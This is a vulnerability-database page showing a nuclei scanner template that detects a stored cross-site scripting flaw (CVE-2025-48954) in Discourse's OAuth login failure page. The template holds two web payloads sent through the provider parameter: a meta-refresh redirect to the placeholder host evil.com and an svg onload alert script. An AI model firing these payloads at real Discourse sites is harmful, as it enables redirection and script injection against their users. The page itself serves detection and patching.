Lucene search
K

Discourse OAuth Social Login - Cross-site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Discourse prior to version 3.5.0.beta6 has a stored XSS vulnerability in social login functionality

Related
Refs
Code
id: CVE-2025-48954

info:
  name: Discourse OAuth Social Login - Cross-site Scripting
  author: ferreiraklet,DhiyaneshDK,pdresearch
  severity: high
  description: |
    Discourse versions prior to 3.5.0.beta6 contain a stored Cross-Site Scripting (XSS) vulnerability in the OAuth/social login functionality. The vulnerability is caused by lack of proper content security policy enforcement when processing social login failures,allowing remote attackers to inject and execute malicious scripts in users' browsers.
  impact: |
    Attackers can inject malicious scripts through the provider parameter in OAuth login failures, executing JavaScript in victim browsers and potentially achieving session hijacking.
  remediation: Update the discourse to version 3.5.0.beta6 or later.
  reference:
    - https://github.com/discourse/discourse/security/advisories/GHSA-26p5-mjjh-wfcf
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48954
  classification:
    cve-id: CVE-2025-48954
    cwe-id: CWE-79
    epss-score: 0.0063
    epss-percentile: 0.45837
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    shodan-query: http.component:"Discourse"
    fofa-query: app="Discourse"
    zoomeye-query: app:"Discourse"
    hunter-query: web.title="Discourse"
  tags: cve,cve2025,discourse,xss,oauth,vuln

variables:
  # XSS payloads for different exploitation scenarios
  redirect_payload: "%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttps%3A//evil.com%22%3E"
  basic_xss: "<svg/onload=alert('XSS-CVE-2025-48954')>"

http:
  - method: GET
    path:
      # Test 1: Open redirect via meta refresh injection
      - '{{BaseURL}}/auth/failure?provider={{redirect_payload}}'

      # Test 2: Basic XSS payload injection
      - '{{BaseURL}}/auth/failure?provider={{basic_xss}}'


    matchers:
      - type: dsl
        name: open-redirect-meta-refresh
        dsl:
          - 'contains(body, "<meta http-equiv=\"refresh\" content=\"0;url=https://evil.com\">")'
          - 'contains(to_lower(body), "discourse")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        name: basic-xss-execution
        dsl:
          - 'contains(body, "onload=alert(")'
          - 'contains(body, "XSS-CVE-2025-48954")'
          - 'contains(to_lower(body), "discourse")'
          - 'status_code == 200'
          - '!contains(to_lower(header), "content-security-policy")'
        condition: and

    extractors:
      - type: regex
        name: discourse_version
        group: 1
        regex:
          - '<meta name="generator" content="Discourse ([0-9]+\.[0-9]+\.[0-9]+(?:\.beta[0-9]+)?)'
          - "(?i)discourse['\"]?\\s*:\\s*['\"]?([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"
          - "(?i)x-discourse-version:\\s*([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"
          - '"version"\\s*:\\s*"([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"'
          - '<!-- Discourse ([0-9]+\.[0-9]+\.[0-9]+(?:\.beta[0-9]+)?)'
          - '/assets/discourse-([0-9]+\.[0-9]+\.[0-9]+(?:\.beta[0-9]+)?)'
          - "(?i)discourse[^\"']*?([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"
# digest: 4a0a004730450220122921bd00fd5760add9ad02ff2d010e96d4c36f5844d04833e61d9960d46e1e022100d14db5cc557c22b4c4f0c432ea4df3457d366810ed591fd5c95036765639f594:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1 - 8.1
EPSS0.0063
SSVC
25